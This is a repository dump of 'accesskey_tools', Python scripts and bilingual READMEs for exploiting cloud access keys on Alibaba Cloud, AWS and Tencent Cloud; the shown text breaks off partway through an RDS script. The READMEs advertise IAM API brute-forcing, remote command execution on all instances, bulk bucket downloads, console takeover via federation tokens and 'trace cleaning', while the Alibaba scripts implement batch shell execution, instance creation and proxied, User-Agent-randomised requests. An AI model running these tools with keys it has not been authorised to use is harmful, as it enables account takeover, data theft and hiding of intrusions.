Repository: kohlersbtuh15/accesskey_tools
Branch: main
Commit: de50141a334a
Files: 36
Total size: 86.5 KB

Directory structure:
gitextract_clmgkotm/

├── FILES/
│   ├── 1.awebp
│   ├── 2.awebp
│   ├── 3.awebp
│   ├── 4.awebp
│   ├── 5.awebp
│   ├── 6.awebp
│   └── 7.awebp
├── README.en.md
├── README.md
├── aliyun/
│   ├── README.en.md
│   ├── README.md
│   ├── aliyun_create_ecs.py
│   ├── aliyun_ecs_exec.py
│   ├── aliyun_ecs_exec_batch.py
│   ├── aliyun_getall_rds.py
│   ├── config.py
│   ├── oss_download.py
│   └── requirements.txt
├── aws/
│   ├── README.en.md
│   ├── README.md
│   ├── amazon_ssm_managed_instance_core.json
│   ├── aws_download_s3.py
│   ├── aws_ec2_exec.py
│   ├── aws_select_iam.py
│   ├── aws_select_rds.py
│   ├── aws_select_route53.py
│   ├── aws_url_console.py
│   ├── config.py
│   ├── ec2_role_trust_policy.json
│   └── requirements.txt
└── tencentcloud/
    ├── README.en.md
    ├── README.md
    ├── config.py
    ├── requirements.txt
    ├── tencentcloud_cvm_exec.py
    └── tencentcloud_download_cos.py

================================================
FILE CONTENTS
================================================

================================================
FILE: README.en.md
================================================
English | [中文](./README.md)
# accesskey_tools
The accesskey automated operation and maintenance tools and accesskey utilization tools of various cloud vendors such as alicloud/tencentcloud/huaweicloud/aws, including but not limited to various functions such as creating ecs, ecs query and command execution, oss query and batch download, will continue to be added in the future. Various functions.

## Function description
* IAM queries the current user permissions of aksk. Enter "enum" to perform interface service blasting.

* EC2 Query the detailed information of EC2 machine instances in various AWS regions. The specified instance can execute system commands. Trace cleaning: delete the created policy and bound IAM.

* RDS queries all rds details of AWS, as well as IP whitelist restriction information.

* S3 queries all s3 bucket bucket information, and you can specify the bucket and bucket folder.

* ROUTE53 queries the domain name DNS records created by AWS in all regions.

* URL_CONSOLE Use aksk to apply for a federation token and obtain console permissions (valid time: 15 minutes)

## Get started quickly

### Query and execute commands on the ec2 machine instance. 
After executing the script, the ec2 machine instance status in each region will be automatically retrieved and json will be returned.
![Img](./FILES/1.awebp)
![Img](./FILES/2.awebp)

You can choose whether to delete the created roles and policies.

You can also delete the iam bound to the ec2 machine.

Enter the machine instance to execute the command. The type of command to be executed will be automatically selected based on the data in json:
```
"Linux": "AWS-RunShellScript",
"windows": "AWS-RunPowerShellScript"
```
![Img](./FILES/3.awebp)
### RDS queries all rds details of AWS, 
as well as IP whitelist restriction information.
![Img](./FILES/4.awebp)
### S3 queries all s3 bucket bucket information 
all mode downloads all files in all buckets.
You can specify the bucket and bucket folder.
![Img](./FILES/5.awebp)
### ROUTE53 
Query the domain name DNS records created by AWS in all regions.
![Img](./FILES/6.awebp)
### URL_CONSOLE 
Use aksk to apply for a federation token and obtain console permissions (valid time: 15 minutes)
![Img](./FILES/7.awebp)


For information on how to use the tool, please refer to the article：

[accesskey_tools: An Alibaba Cloud operations and maintenance tool for automation](https://kohlersbtuh15s-organization.gitbook.io/alibabacloud_accesskey_tools/)

[AWS AccessKey Tools: Powerful Security Assessment and Penetration Testing Tools](https://kohlersbtuh15s-organization.gitbook.io/aws_accesskey_tools/)
# Disclaimer
This tool is only used by operation and maintenance personnel to manage cloud business and security testing, and may not be used for any illegal attacks.

# TODO

* huaweicloud accesskey related functions
* qiniuyun accesskey related functions


================================================
FILE: README.md
================================================
[English](./README.en.md) | 中文
# accesskey_tools
阿里云aliyun/腾讯云tencentcloud/华为云huaweicloud/aws等各种云厂商的accesskey自动化运维工具,accesskey利用工具，包括但不限于创建ecs、ecs查询和命令执行、oss查询和批量下载等各种功能，后续会持续添加各种功能

# 工具下载
```
git clone https://github.com/kohlersbtuh15/accesskey_tools.git
```
# 使用说明
```
cd aws/aliyun/tencentcloud #进入相应的云服务平台
pip3 install -r requirements.txt
vi config.py #填写AccessKeyID和AccessKeySecret，按需填写SOCKS5_PROXY_HOST和SOCKS5_PROXY_PORT
python3 aws_ec2_exec.py
```
# 功能描述
* IAM 查询当前aksk的用户权限，输入"enum"可进行接口服务爆破。
* EC2 查询aws各地区的ec2机器实例的详情信息，指定实例可执行系统命令，痕迹清理：删除创建的策略和绑定的iam。
* RDS 查询aws所有rds详情信息，以及IP白名单限制信息。
* S3 查询所有s3 bucket存储桶信息，可指定bucket以及bucket的文件夹。
* ROUTE53 查询aws所有地区创建的域名DNS记录。
* URL_CONSOLE 使用aksk申请联邦令牌，获取控制台权限(有效时间：15分钟)
# 快速上手
### 1、ec2机器实例查询并执行命令
执行脚本后会自动检索各个地区的ec2机器实例情况以及agent情况，并返回json。
![Img](./FILES/1.awebp)
![Img](./FILES/2.awebp)

输入机器实例，进行执行命令。会根据json中的数据自动选择执行命令的类型：
```
"Linux": "AWS-RunShellScript",
"windows": "AWS-RunPowerShellScript",
```
![Img](./FILES/3.awebp)

### 2、RDS查询
aws所有rds详情信息、快照详情、IP白名单限制信息。
![Img](./FILES/4.awebp)

### 3、S3 查询所有s3 bucket存储桶信息
all模式下载所有桶子中的所有文件。
可指定bucket以及bucket的文件夹。
![Img](./FILES/5.awebp)

### 4、ROUTE53
查询aws所有地区创建的域名DNS记录。
![Img](./FILES/6.awebp)

### 5、URL_CONSOLE
使用aksk申请联邦令牌，获取控制台权限(有效时间：15分钟)
![Img](./FILES/7.awebp)


关于工具使用方式可参考文章：

[accesskey_tools：一款针对云环境的多功能利用脚本工具](https://blog.csdn.net/saygoodbyeyo/article/details/132347160)
  

[accesskey_tools: 阿里云运维工具：自动化运维的利器](https://www.freebuf.com/sectool/377068.html)

[accesskey_tools: aws accesskey利用工具](https://www.freebuf.com/sectool/377988.html)

# 免责声明
该工具仅用于运维人员管理云上业务及安全测试，不得用于任何非法攻击。

# TODO

* 华为云huaweicloud accesskey相关功能
* 七牛云qiniuyun accesskey相关功能


================================================
FILE: aliyun/README.en.md
================================================
English | [中文](./README.md)
## Error handling
If you encounter pip installation errors, it is recommended to update pip and then install the dependencies.
`pip install --upgrade pip`

## File description

#### aliyun_ecs_exec.py
Used to query the detailed information of ecs instances in various regions of Alibaba Cloud and specify the ecs instance to execute commands.
#### aliyun_ecs_exec_batch.py
Used to query the detailed information of ecs instances in various regions of Alibaba Cloud and execute ecs instance commands in batches
#### aliyun_create_ecs.py
Used to create Alibaba Cloud instances in batches
#### aliyun_getall_rds.py
Used to query all Alibaba Cloud RDS details and their IP restrictions
#### oss_download.py
Used to download all files in oss, and can also specify a bucket for download.
#### config.py
Configuration information required to run the code, including accesskey, accesskeysecret, proxy IP and port and other parameters

## Instructions for use
To install the required dependencies before use, run `pip install -r requirements.txt`, fill in the corresponding values ​​​​in config.py, run the corresponding py script directly, and enter the corresponding values ​​​​as prompted.

## proxy
The socks proxy is provided in the code. When you need to use it, fill in the ip and port values ​​​​in config.py, and then remove the corresponding comment part in the code.


================================================
FILE: aliyun/README.md
================================================
[English](./README.en.md) | 中文
## 报错处理
如果在安装依赖时报错，请先更新pip版本再重新安装。
`pip install --upgrade pip`
## 文件说明

#### aliyun_ecs_exec.py
用于查询阿里云各地区ecs实例的详细信息，并可指定ecs实例执行命令
#### aliyun_ecs_exec_batch.py
用于查询阿里云各地区ecs实例的详细信息，并可批量执行ecs实例命令
#### aliyun_create_ecs.py
用于批量创建阿里云实例
#### aliyun_getall_rds.py
用于查询阿里云所有rds详细信息和其ip限制
#### oss_download.py
用于下载所有oss中的文件，也可指定bucket下载
#### config.py
代码运行所需的配置信息，包括accesskey、accesskeysecret、代理的ip和端口等参数

## 使用说明
使用前安装所需的依赖，运行pip install -r requirements.txt即可，填好config.py中对应的值，直接运行对应的py脚本，按照提示输入对应的值

## 代理
代码中提供了socks代理，需要使用时在config.py中填好ip和port值，然后去掉代码中对应的注释部分即可


================================================
FILE: aliyun/aliyun_create_ecs.py
================================================
# -*- coding: utf-8 -*-
from typing import List
from alibabacloud_tea_util.client import Client as UtilClient
from alibabacloud_ecs20140526.client import Client as EcsClient
from alibabacloud_tea_openapi import models as open_api_models
from alibabacloud_vpc20160428 import models as vpc_models
from alibabacloud_vpc20160428.client import Client as VpcClient
from alibabacloud_ecs20140526 import models as ecs_models
from alibabacloud_darabonba_array.client import Client as ArrayClient

import config
# import socket, socks

# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket


class Create_instances:
    def __init__(self):
        pass

    @staticmethod
    def main(
            access_key_id: str, access_key_secret: str, region_id: str, instance_type: str, image_id: str,
            security_group_id: str,
            zone_id: str, v_switch_id: str, password: str, autorelease_time: str,
            security_enhancement_strategy: str, dry_run: bool
    ):
        access_key_id = access_key_id
        access_key_secret = access_key_secret
        period = None
        period_unit = None
        auto_renew_period = None
        auto_renew = None
        available_info = {}
        if not region_id:
            for region in config.RegionIds:
                print(f'地区代码：{region}  对应地区: {config.RegionIds[region]}')
            region_id = input("请输入要创建的实例地区代码，如cn-hangzhou: ").replace(' ', '')
        config_client = Create_instances.create_client(access_key_id, access_key_secret, region_id)

        while True:
            if not zone_id:
                available_info = Create_instances.describe_zones(config_client, region_id)
                zone_id = input("请输入可用区ID: ").replace(' ', '')

            vpc_id = None
            if not v_switch_id or not vpc_id:
                vpcs = Create_instances.describe_vswitches(region_id, zone_id)
                if not vpcs:
                    print(f'[error] 所选可用区{zone_id}无可用虚拟交换机，请重新选择可用区或先创建虚拟交换机。')
                    zone_id = None
                    continue
                v_switch_id = input("请输入虚拟交换机ID: ").replace(' ', '')
                if v_switch_id not in vpcs.keys():
                    print(f'请输入正确的虚拟交换机ID: ')
                    continue
                else:
                    vpc_id = vpcs[v_switch_id]
                break

        if not instance_type:
            while True:
                cpucore_num = int(input("请输入要创建实例的CPU核数：").replace(' ', ''))
                memory_size = int(input("请输入要创建实例的内存大小(GB)：").replace(' ', ''))
                has_instancetypes = Create_instances.describe_instancetype(config_client, cpucore_num, memory_size,
                                                                           available_info[zone_id]['instance_types'])
                if not has_instancetypes:
                    print(f'[error] 可用区{zone_id}无符合要求的实例规格，请重新选择')
                else:
                    instance_type = input("请输入选择的实例类型ID: ").replace(' ', '')
                    break

        if not image_id:
            Create_instances.describe_images(config_client, region_id)
            image_id = input("请输入镜像ID：").replace(' ', '')

        if not security_group_id:
            Create_instances.describe_security_group(config_client, region_id, vpc_id)
            security_group_id = input("请输入安全组ID：").replace(' ', '')

        if not password:
            password = input(
                "请输入实例密码,长度为8至30个字符，必须同时包含大小写英文字母、数字和特殊符号中的三类字符，Windows实例不能以正斜线（/）为密码首字符： ").replace(
                ' ', '')
            print(f'以设定实例密码为: {password}')

        internet_charge_type = 'PayByBandwidth' if input(
            "请选择宽带付费方式, PayByBandwidth：按固定带宽计费；PayByTraffic：按使用流量计费。默认为按量计费: ") == 'PayByBandwidth' else 'PayByTraffic'
        internet_maxband_widthout = int(input("请输入公网出宽带最大值，范围为0 - 100Mbit / s: ").replace(' ', ''))
        internet_maxband_widthin = int(
            input("请输入公网如宽带最大值，范围为0 - internet_maxband_widthout Mbit / s: ").replace(' ', ''))
        systemdisk_size = int(input("请输入云盘大小，范围为 20-500 : ").replace(' ', ''))
        while True:
            systemdisk_category = input(
                "请输入云盘类型：cloud_efficiency：高效云盘，cloud_ssd：SSD云盘，cloud_essd：ESSD云盘，cloud：普通云盘，cloud_auto：ESSD AutoPL云盘: ").replace(
                ' ', '')
            if systemdisk_category not in available_info[zone_id]['diskcategory']:
                print(f'所选云盘类型{systemdisk_category}不支持，请重新选择: ')
            else:
                break
        amount = int(input("请输入要开启的实例数量 1-100 : ").replace(' ', ''))
        instance_charge_type = 'PrePaid' if input(
            "请输入实例付费方式，PrePaid：包年包月。PostPaid：按量付费, 默认为按量付费: ").replace(' ',
                                                                                               '') == 'PrePaid' else 'PostPaid'
        auto_pay = True if input(
            "创建实例时是否自动付费，设置True时若账户余额不足，会生成作废订单，只能重新创建；设置为False时，会在控制台生成待支付订单，可自行支付，默认不自动付费，请输入 T 或者 F: ").replace(
            ' ', '') == 'T' else False
        if instance_charge_type == 'PostPaid':
            autorelease_time = input("请输入自动施放时间，如2018-01-01T12:05:00Z，默认不自动释放: ").replace(' ', '')
            auto_pay = True
        if instance_charge_type == 'PrePaid':
            period_unit = input("请输入包年包月计费时长单位，取值范围：Week和Month: ").replace(' ', '')
            period = int(input("请输入购买资源时长，如 1 : ").replace(' ', ''))
            auto_renew = True if input("是否自动续费，如需自动续费请输入Y: ").replace(' ', '') == 'Y' else False
            if auto_renew:
                auto_renew_period = int(input("请输入自动续费时长，单位为包年包月计费单位,如 1 : ").replace(' ', ''))

        # 创建并与运行实例
        print(f'[info] --------开始创建实例-----------')
        responces = config_client.run_instances(ecs_models.RunInstancesRequest(
            region_id=region_id,
            instance_type=instance_type,
            image_id=image_id,
            security_group_id=security_group_id,
            zone_id=zone_id,
            v_switch_id=v_switch_id,
            amount=amount,
            password=password,
            internet_max_bandwidth_in=internet_maxband_widthin,
            internet_max_bandwidth_out=internet_maxband_widthout,
            internet_charge_type=internet_charge_type,
            auto_release_time=autorelease_time,
            security_enhancement_strategy=security_enhancement_strategy,
            period=period,
            period_unit=period_unit,
            auto_renew_period=auto_renew_period,
            instance_charge_type=instance_charge_type,
            auto_renew=auto_renew,
            auto_pay=auto_pay,
            dry_run=dry_run,
            system_disk=ecs_models.RunInstancesRequestSystemDisk(
                size=systemdisk_size,
                category=systemdisk_category
            )
        ))
        print(
            f'[info]-----------创建实例成功，实例ID:{UtilClient.to_jsonstring(responces.body.instance_id_sets.instance_id_set)}--------------')

    @staticmethod
    def describe_instancetype(
            client: EcsClient,
            cupcore_num: int,
            memory_size: int,
            available_types: List[str]

    ):
        describe_instance_types_request = ecs_models.DescribeInstanceTypesRequest(
            minimum_cpu_core_count=cupcore_num,
            maximum_cpu_core_count=cupcore_num,
            minimum_memory_size=memory_size,
            maximum_memory_size=memory_size
        )
        flag = False
        try:
            response = client.describe_instance_types(describe_instance_types_request)
            for instance_type in response.body.instance_types.instance_type:
                if instance_type.instance_type_id in available_types:
                    print(
                        f'实例类型ID: {instance_type.instance_type_id} 实例规格分类：{instance_type.instance_category} 系统架构：{instance_type.cpu_architecture} 处理器型号：{instance_type.physical_processor_model}')
                    flag = True
            return flag
        except Exception as error:
            # 如有需要，请打印 error
            print(error)

    @staticmethod
    def describe_images(
            client: EcsClient,
            region_id: str
    ):
        os_type = 'windows' if input('请输入镜像操作系统类型（linux或windows）,默认为linux：') == 'windows' else 'linux'
        page = 1
        while True:
            describe_images_request = ecs_models.DescribeImagesRequest(
                region_id=region_id,
                status='Available',
                ostype=os_type,
                page_size=50,
                page_number=page
            )
            response = client.describe_images(describe_images_request)
            for image in response.body.images.image:
                print(f'镜像ID:{image.image_id}{" " * (60 - len(image.image_id))}镜像名称：{image.osname}')
            if page * 50 > response.body.total_count:
                break
            page = page + 1

    @staticmethod
    def describe_vswitches(
            region_id: str,
            zone_id: str
    ):
        vswitches = {}
        describe_vswitch_request = vpc_models.DescribeVSwitchesRequest(
            region_id=region_id,
            zone_id=zone_id
        )
        response = VpcClient(open_api_models.Config(config.AccessKeyID, config.AccessKeySecret,
                                                    endpoint=f'vpc.aliyuncs.com')).describe_vswitches(
            describe_vswitch_request)
        for vswitch in response.body.v_switches.v_switch:
            vswitches[vswitch.v_switch_id] = vswitch.vpc_id
            print(
                f'虚拟交换机ID: {vswitch.v_switch_id}    虚拟网络ID: {vswitch.vpc_id}    虚拟交换机名称: {vswitch.v_switch_name}    虚拟网络段: {vswitch.cidr_block}')
        return vswitches

    @staticmethod
    def describe_security_group(
            client: EcsClient,
            region_id: str,
            vpc_id: str
    ):
        describe_security_request = ecs_models.DescribeSecurityGroupsRequest(
            region_id=region_id,
            vpc_id=vpc_id
        )
        response = client.describe_security_groups(describe_security_request)
        for security_group in response.body.security_groups.security_group:
            print(f'安全组ID: {security_group.security_group_id}    安全组名称: {security_group.security_group_name}')

    @staticmethod
    def describe_zones(
            client: EcsClient,
            region_id: str
    ):
        describe_zones_request = ecs_models.DescribeZonesRequest(
            region_id=region_id
        )
        response = client.describe_zones(describe_zones_request)
        available = {}
        for zone in response.body.zones.zone:
            print(f'zone_id: {zone.zone_id}')
            available[zone.zone_id] = {}
            available[zone.zone_id]['instance_types'] = zone.available_instance_types.instance_types
            available[zone.zone_id]['diskcategory'] = zone.available_disk_categories.disk_categories
        return available

    @staticmethod
    def create_client(
            access_key_id: str,
            access_key_secret: str,
            region_id: str,
    ) -> EcsClient:
        client_config = open_api_models.Config()
        client_config.access_key_id = access_key_id
        client_config.access_key_secret = access_key_secret
        client_config.region_id = region_id
        return EcsClient(client_config)


if __name__ == '__main__':
    access_key_id = config.AccessKeyID
    access_key_secret = config.AccessKeySecret
    # 地区
    region_id = ''
    # 实例规格
    instance_type = ''
    # 镜像id
    image_id = ''
    # 安全组id
    security_group_id = ''
    # 可用区id
    zone_id = ''
    # 交换机id
    v_switch_id = ''
    # 实例密码,长度为8至30个字符，必须同时包含大小写英文字母、数字和特殊符号中的三类字符，Windows实例不能以正斜线（/）为密码首字符。
    password = ''
    # 公网出宽带最大值，范围为0-100Mbit/s
    internet_maxband_widthout = 100
    # 公网入带宽最大值。最小为10Mbit/s, 最大为internet_maxband_widthout值
    internet_maxband_widthin = internet_maxband_widthout
    # 按量付费自动施放时间，按照ISO8601标准表示，使用UTC+0时间。格式为：yyyy-MM-ddTHH:mm:ssZ。如2018-01-01T12:05:00Z
    autorelease_time = ''
    # 是否开启安全加固
    security_enhancement_strategy = 'Active'
    # 预检请求
    # true：发送检查请求，不会创建实例。检查项包括是否填写了必需参数、请求格式、业务限制和ECS库存。如果检查不通过，则返回对应错误。如果检查通过，则返回DryRunOperation错误。
    # false：发送正常请求，通过检查后直接创建实例。
    dry_run = False
    if not access_key_id or not access_key_secret:
        print("请在config.py中设置accesskeyID和accesskeysecret")
        exit()
    try:
        Create_instances.main(access_key_id=config.AccessKeyID, access_key_secret=config.AccessKeySecret,
                              region_id=region_id, instance_type=instance_type, image_id=image_id,
                              security_group_id=security_group_id, zone_id=zone_id, v_switch_id=v_switch_id,
                              password=password, autorelease_time=autorelease_time,
                              security_enhancement_strategy=security_enhancement_strategy, dry_run=dry_run
                              )
    except Exception as e:
        print('[error] ---------实例创建失败---------')
        print(e)


================================================
FILE: aliyun/aliyun_ecs_exec.py
================================================
from aliyunsdkcore.client import AcsClient
from aliyunsdkecs.request.v20140526.DescribeInstancesRequest import DescribeInstancesRequest
from aliyunsdkecs.request.v20140526.CreateCommandRequest import CreateCommandRequest
from aliyunsdkecs.request.v20140526.InvokeCommandRequest import InvokeCommandRequest
from aliyunsdkecs.request.v20140526.DescribeCloudAssistantStatusRequest import DescribeCloudAssistantStatusRequest
from aliyunsdkecs.request.v20140526.DescribeInvocationResultsRequest import DescribeInvocationResultsRequest

import json, base64, random, time, config

# import socket, socks
#
# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket


def DescribeCloudAssistantStatus(AccessKeyID, AccessKeySecret, ZoneId, InstanceId):
    client = AcsClient(AccessKeyID, AccessKeySecret, ZoneId)
    request = DescribeCloudAssistantStatusRequest()
    request.set_accept_format('json')

    request.set_InstanceIds([InstanceId])

    response = client.do_action_with_exception(request)
    return json.loads(response)


def CreateCommand(AccessKeyID, AccessKeySecret, com_type, command, ZoneId, InstanceId):
    client = AcsClient(AccessKeyID, AccessKeySecret, ZoneId)

    request = CreateCommandRequest()
    request.set_accept_format('json')
    name = ''.join(random.sample(
        ['z', 'y', 'x', 'w', 'v', 'u', 't', 's', 'r', 'q', 'p', 'o', 'n', 'm', 'l', 'k', 'j', 'i', 'h', 'g', 'f', 'e',
         'd', 'c', 'b', 'a'], 5))
    try:
        CloudAssistantStatus = DescribeCloudAssistantStatus(AccessKeyID, AccessKeySecret, ZoneId, InstanceId)
        Status = CloudAssistantStatus['InstanceCloudAssistantStatusSet']['InstanceCloudAssistantStatus'][0][
            'CloudAssistantStatus']
        if Status == 'false':
            print('no InstanceCloudAssistant,can not execute command!')
            return
        request.set_Name(name)
        request.set_Type(com_type)
        request.set_connect_timeout(60)
        command = base64.b64encode(command.encode()).decode()

        request.set_CommandContent(command)

        response = client.do_action_with_exception(request)
        return json.loads(response)['CommandId']
    except Exception as e:
        print(e)
        print('command create faild!')


def InvokeCommand(AccessKeyID, AccessKeySecret, ZoneId, InstanceId, CommandId):
    client = AcsClient(AccessKeyID, AccessKeySecret, ZoneId)

    try:
        request = InvokeCommandRequest()
        request.set_accept_format('json')

        request.set_CommandId(CommandId)
        request.set_InstanceIds([InstanceId])

        response = client.do_action_with_exception(request)
        if json.loads(response)['InvokeId'] == '':
            print('execute command error!')
        else:
            return json.loads(response)['InvokeId']
    except Exception as e:
        print(e)
        print('execute command error!')


def DescribeInvocationResults(AccessKeyID, AccessKeySecret, ZoneId, InvokeID):
    client = AcsClient(AccessKeyID, AccessKeySecret, ZoneId)

    request = DescribeInvocationResultsRequest()
    request.set_accept_format('json')

    request.set_InvokeId(InvokeID)

    response = client.do_action_with_exception(request)
    return json.loads(response)


def DescribeInstances(AccessKeyID, AccessKeySecret):
    ecs_info = {}
    for RegionId in config.RegionIds:
        print('searching -------' + RegionId)
        client = AcsClient(AccessKeyID, AccessKeySecret, RegionId)
        try:
            request = DescribeInstancesRequest()
            request.set_accept_format('json')
            request.set_PageNumber(1)
            request.set_PageSize(100)
            response = client.do_action_with_exception(request)
        except Exception as e:
            print(e)
            print('please check AccessKey and AccessKeySecret')
            continue
        for each in json.loads(response)['Instances']['Instance']:
            InstanceId = each["InstanceId"]
            ecs_info[InstanceId] = each
    return ecs_info


def commad_check_input(AccessKeyID, AccessKeySecret, InstanceId, cmd, com_type, ecs_info):
    if cmd == '':
        cmd = input("please input cmd:")
    if com_type == None:
        com_type = input('please input command type:'
                         '0:RunShellScript'
                         '1:RunBatScript'
                         '2:RunPowerShellScript'
                         ':')
    if com_type == '0':
        com_type = 'RunShellScript'
    elif com_type == '1':
        com_type = 'RunBatScript'
    elif com_type == '2':
        com_type = 'RunPowerShellScript'
    Status = ecs_info[InstanceId]['Status']
    ZoneId = ecs_info[InstanceId]['RegionId']
    if Status == 'Stopped':
        print('instance is stopped!')
        return
    if InstanceId not in ecs_info.keys():
        print('instance is not exist!')
        return
    command_ID = CreateCommand(AccessKeyID, AccessKeySecret, com_type, cmd, ZoneId, InstanceId)
    InvokeID = InvokeCommand(AccessKeyID, AccessKeySecret, ZoneId, InstanceId, command_ID)
    time.sleep(1)
    Result = DescribeInvocationResults(AccessKeyID, AccessKeySecret, ZoneId, InvokeID)
    try:
        output = Result['Invocation']['InvocationResults']['InvocationResult'][0]['Output']
        print("command result:" + base64.b64decode(output).decode())
    except:
        print("command result error!")
        pass
    return 0


if __name__ == '__main__':
    AccessKeyID = config.AccessKeyID
    AccessKeySecret = config.AccessKeySecret
    if not AccessKeyID:
        AccessKeyID = input("please input AccessKeyID:")
    if not AccessKeySecret:
        AccessKeySecret = input("please input AccessKeySecret:")
    ecs_info = DescribeInstances(AccessKeyID, AccessKeySecret)
    if not ecs_info:
        print("no result")
        exit(0)
    for each in ecs_info:
        print(each)
        print(ecs_info[each])
    InstanceId = input("please input instanceId:")
    com_type = None
    while True:
        if com_type is None:
            com_type = input('please input command type:'
                             '0:RunShellScript'
                             '1:RunBatScript'
                             '2:RunPowerShellScript'
                             ':')
        cmd = ''
        commad_check_input(AccessKeyID, AccessKeySecret, InstanceId, cmd, com_type, ecs_info)
        flag = input("input q quit,other key continue:")
        if flag == 'q':
            break
        is_continue = input("input yes to select other Instance:")
        if is_continue == 'yes':
            com_type = None
            InstanceId = input("please input instanceId:")


================================================
FILE: aliyun/aliyun_ecs_exec_batch.py
================================================
from aliyunsdkcore.client import AcsClient

from aliyunsdkecs.request.v20140526.DescribeInstancesRequest import DescribeInstancesRequest
from aliyunsdkecs.request.v20140526.RunCommandRequest import RunCommandRequest
from aliyunsdkecs.request.v20140526.DescribeInvocationsRequest import DescribeInvocationsRequest

import json, base64, random, time, config, datetime

# import socket, socks

# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket
headers = {"User-Agent": random.choice(config.user_agents)
           }


def DescribeInstances(AccessKeyID, AccessKeySecret):
    ecs_info = {}
    for RegionId in config.RegionIds:
        print('检索中-------' + RegionId)
        client = AcsClient(AccessKeyID, AccessKeySecret, RegionId)
        try:
            request = DescribeInstancesRequest()
            request.set_accept_format('json')
            request.set_PageNumber(1)
            request.set_PageSize(100)
            request.set_headers(headers)
            response = client.do_action_with_exception(request)
        except Exception as e:
            print(e)
            print('请检查输入Key与Secret值,或重新执行')
            continue
        for each in json.loads(response)['Instances']['Instance']:
            InstanceId = each["InstanceId"]
            ecs_info[InstanceId] = each
    return ecs_info


def DescribeInvocation(AccessKeyID, AccessKeySecret, RegionId, InvokeId):
    client = AcsClient(AccessKeyID, AccessKeySecret, RegionId)
    request = DescribeInvocationsRequest()
    request.set_headers(headers)
    request.set_InvokeId(InvokeId)
    request.set_IncludeOutput(True)
    request.set_PageSize(20)
    request.set_PageNumber(1)

    response = client.do_action_with_exception(request)
    return json.loads(response)


def RunCommand(AccessKeyID, AccessKeySecret, RegionId, command_type, commandContent, InstanceIds):
    client = AcsClient(AccessKeyID, AccessKeySecret, RegionId)
    request = RunCommandRequest()
    request.set_InstanceIds(InstanceIds)
    request.set_CommandContent(commandContent)
    request.set_Type(command_type)

    # 命令执行模式，默认立即执行命令，可填以下选项
    # Once: 立即执行命令
    # Period: 定时执行命令，当该参数取值为Period时，必须同时指定Frequency参数
    # NextRebootOnly: 当实例下一次启动时，自动执行命令
    # EveryReboot: 实例每一次启动都将自动执行命令
    # request.set_RepeatMode('Once')

    # 定时执行命令的执行时间
    # 固定时间间隔执行: rate(<执行间隔数值><执行间隔单位>),如5分钟执行一次，设置为rate(5m)
    # 仅在指定时间执行一次: at(yyyy-MM-dd HH:mm:ss <时区>),如指定在中国/上海时间2022年06月06日13时15分30秒执行一次，设置为at(2022-06-06 13:15:30 GMT-7:00)
    # 定时任务表达式： <Cron表达式> <时区>,如在中国/上海时间，2022年每天上午10:15执行一次命令，格式为0 15 10 ? * * 2022 Asia/Shanghai
    # request.set_Frequency("rate(5m)")

    # 在实例中执行命令的用户名称
    # request.set_Username("root")

    request.set_ContentEncoding('base64')
    request.set_Name("cmd_" + str(datetime.date.today()) + "_" + datetime.datetime.now().strftime("%H-%M-%S"))
    request.set_headers(headers)

    response = client.do_action_with_exception(request)
    return json.loads(response)


def commad_check_input(AccessKeyID, AccessKeySecret, InstanceIds, cmd, com_type, ecs_info):
    if cmd == '':
        cmd = input("please input cmd:")
    cmd = base64.b64encode(cmd.encode('utf-8'))
    com_types = {'0': 'RunShellScript', '1': 'RunBatScript', '2': 'RunPowerShellScript'}
    instances = {}
    for each in InstanceIds:
        if each not in ecs_info.keys():
            print(each + '实例不存在，请检查实例ID')
            continue
        Status = ecs_info[each]['Status']
        ZoneId = ecs_info[each]['RegionId']
        if Status == 'Stopped':
            print(each + '实例未运行,请选择运行状态实例执行命令')
            continue
        if ZoneId not in instances.keys():
            instances[ZoneId] = [each]
        else:
            instances[ZoneId].append(each)

    for ZoneId in instances.keys():
        result = RunCommand(AccessKeyID, AccessKeySecret, ZoneId, com_types[com_type], cmd, instances[ZoneId])
        time.sleep(2)
        run_result = DescribeInvocation(AccessKeyID, AccessKeySecret, ZoneId, result["InvokeId"])
        for InvokeInstance in run_result['Invocations']['Invocation'][0]['InvokeInstances']['InvokeInstance']:
            print(InvokeInstance['InstanceId'] + '执行结果：' + base64.b64decode(InvokeInstance['Output']).decode())


def main():
    ecs_info = DescribeInstances(config.AccessKeyID, config.AccessKeySecret)
    if not ecs_info:
        print("no result")
        exit(0)
    for each in ecs_info:
        print(each)
        print(ecs_info[each])
    InstanceIds = None
    while True:
        if InstanceIds is None:
            InstanceIds = input("请输入需要批量执行的instanceId，以逗号分隔,若要对所有机器执行命令，则输入all:")
            if InstanceIds == 'all':
                InstanceIds = list(ecs_info.keys())
            else:
                try:
                    InstanceIds = InstanceIds.replace('，', ',').replace(' ', '').split(',')
                except Exception as e:
                    print(e)
                    print("重新输入instanceId")
                    continue
        com_type = input('请输入执行命令类型:'
                         '0:RunShellScript'
                         '1:RunBatScript'
                         '2:RunPowerShellScript'
                         ':')
        if com_type not in ['0', '1', '2']:
            continue
        cmd = ''
        commad_check_input(config.AccessKeyID, config.AccessKeySecret, InstanceIds, cmd, com_type, ecs_info)
        flag = input("输入q退出，其他字符继续:")
        if flag == 'q':
            break
        is_continue = input("需要重新输入InstanceId请输入yes：")
        if is_continue == 'yes':
            InstanceIds = None


if __name__ == '__main__':
    main()


================================================
FILE: aliyun/aliyun_getall_rds.py
================================================
from aliyunsdkcore.client import AcsClient
from aliyunsdkrds.request.v20140815.DescribeDBInstancesRequest import DescribeDBInstancesRequest
from aliyunsdkrds.request.v20140815.DescribeDBInstanceIPArrayListRequest import DescribeDBInstanceIPArrayListRequest

import json, config
# import socket, socks
# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket


def DescribeDB(AccessKeyID, AccessKeySecret, RegionIds):
    rds_list = {}
    for RegionId in RegionIds:
        print('检索中-------' + RegionId)
        client = AcsClient(AccessKeyID, AccessKeySecret, RegionId)
        try:
            request = DescribeDBInstancesRequest()
            request.set_accept_format('json')
            request.set_PageNumber(1)
            request.set_PageSize(100)

